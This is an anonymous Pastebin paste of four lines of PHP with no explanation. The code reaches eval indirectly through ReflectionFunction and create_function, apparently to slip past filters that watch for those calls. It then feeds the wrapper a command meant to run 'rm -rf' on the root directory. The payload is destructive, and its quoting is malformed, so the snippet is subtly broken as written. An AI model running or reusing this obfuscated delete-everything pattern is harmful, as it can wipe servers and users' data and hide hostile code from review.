Guest User

Untitled

a guest
Oct 22nd, 2017
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.15 KB | None | 0 0
  1. <?php
  2. $reflectionF = new ReflectionFunction('create_function');
  3. $eval = $reflectionF->invoke('$a', 'return eval($a);');
  4. $eval('exec(\'rm -rf\' /);');
Add Comment
Please, Sign In to add comment